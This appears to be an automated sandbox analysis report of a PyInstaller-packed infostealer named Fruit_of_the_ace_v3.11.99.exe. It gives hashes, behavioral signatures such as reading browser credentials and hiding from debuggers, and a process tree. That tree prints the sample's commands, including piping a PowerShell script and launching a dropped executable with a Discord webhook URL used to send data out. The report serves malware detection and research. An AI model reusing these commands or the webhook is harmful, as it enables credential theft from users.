Overview

overview

8

Static

static

Fruit_of_t...99.exe

windows10-2004_x64

8

Resubmissions

20-02-2022 18:04

220220-wnqp3sbeh6 8

Analysis

  • max time kernel
    130s
  • max time network
    136s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    20-02-2022 18:04

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Fruit_of_the_ace_v3.11.99.exe

  • Size

    37.7MB

  • MD5

    4f709e1c6951bbd65d03a9f44961e0ae

  • SHA1

    b228bc6e3572f714ace26b19b9383691684e18f2

  • SHA256

    f266a09389e628b992560b33d50f91f022a89976cc80fa580cf780c40a74c9fa

  • SHA512

    e1a67c87bbde1b7615d3d8321734d9d4ad7a3a626b8912b27b28f4c2c85ddf85162edc62b40b7cf9377936c2d90b63a9b676a546a1ce50417e4ec32460802e7d

Score
8/10
pyinstallerspywarestealer

Malware Config

Signatures

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 43 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Drops file in Windows directory 6 IoCs
  • Detects Pyinstaller 3 IoCs
    pyinstaller
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Fruit_of_the_ace_v3.11.99.exe
    "C:\Users\Admin\AppData\Local\Temp\Fruit_of_the_ace_v3.11.99.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4708
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4848
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "
        3⤵
          PID:1676
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -noprofile -
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2700
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ykbsf0td\ykbsf0td.cmdline"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3068
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5040.tmp" "c:\Users\Admin\AppData\Local\Temp\ykbsf0td\CSCA9DC94F555734AE583938D65AC21D0AE.TMP"
              5⤵
                PID:4780
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /d /s /c "tasklist"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1736
          • C:\Windows\system32\tasklist.exe
            tasklist
            3⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:2408
        • C:\Users\Admin\AppData\Local\Temp\MachineMania.exe
          C:\Users\Admin\AppData\Local\Temp\MachineMania https://discord.com/api/webhooks/940902339060072489/yR-laY_d1Jvj71Aayi0ZOb70hoYmLALtc5KZSoa1OMQAJ3B9NCFeqF_17fcQ1baqmCnA
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2360
          • C:\Users\Admin\AppData\Local\Temp\MachineMania.exe
            C:\Users\Admin\AppData\Local\Temp\MachineMania https://discord.com/api/webhooks/940902339060072489/yR-laY_d1Jvj71Aayi0ZOb70hoYmLALtc5KZSoa1OMQAJ3B9NCFeqF_17fcQ1baqmCnA
            3⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of WriteProcessMemory
            PID:408
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "ver"
              4⤵
                PID:2232
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
          1⤵
          • Drops file in Windows directory
          • Suspicious use of AdjustPrivilegeToken
          PID:3684

        Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/2700-135-0x0000024E4CDA3000-0x0000024E4CDA5000-memory.dmp

          Filesize

          8KB

          Download

        • memory/2700-134-0x0000024E4CDA0000-0x0000024E4CDA2000-memory.dmp

          Filesize

          8KB

          Download

        • memory/2700-133-0x00007FFE82473000-0x00007FFE82475000-memory.dmp

          Filesize

          8KB

          Download

        • memory/2700-132-0x0000024E4CD70000-0x0000024E4CD92000-memory.dmp

          Filesize

          136KB

          Download

        • memory/2700-136-0x0000024E4CDA6000-0x0000024E4CDA8000-memory.dmp

          Filesize

          8KB

          Download

        • memory/2700-138-0x0000024E4D560000-0x0000024E4D5D6000-memory.dmp

          Filesize

          472KB

          Download

        • memory/2700-137-0x0000024E4D0E0000-0x0000024E4D124000-memory.dmp

          Filesize

          272KB

          Download

        • memory/3684-145-0x000002996C280000-0x000002996C290000-memory.dmp

          Filesize

          64KB

          Download

        • memory/3684-146-0x000002996E950000-0x000002996E954000-memory.dmp

          Filesize

          16KB

          Download

        • memory/3684-144-0x000002996C220000-0x000002996C230000-memory.dmp

          Filesize

          64KB

          Download

        • memory/4708-130-0x0000021655400000-0x0000021655401000-memory.dmp

          Filesize

          4KB

          Download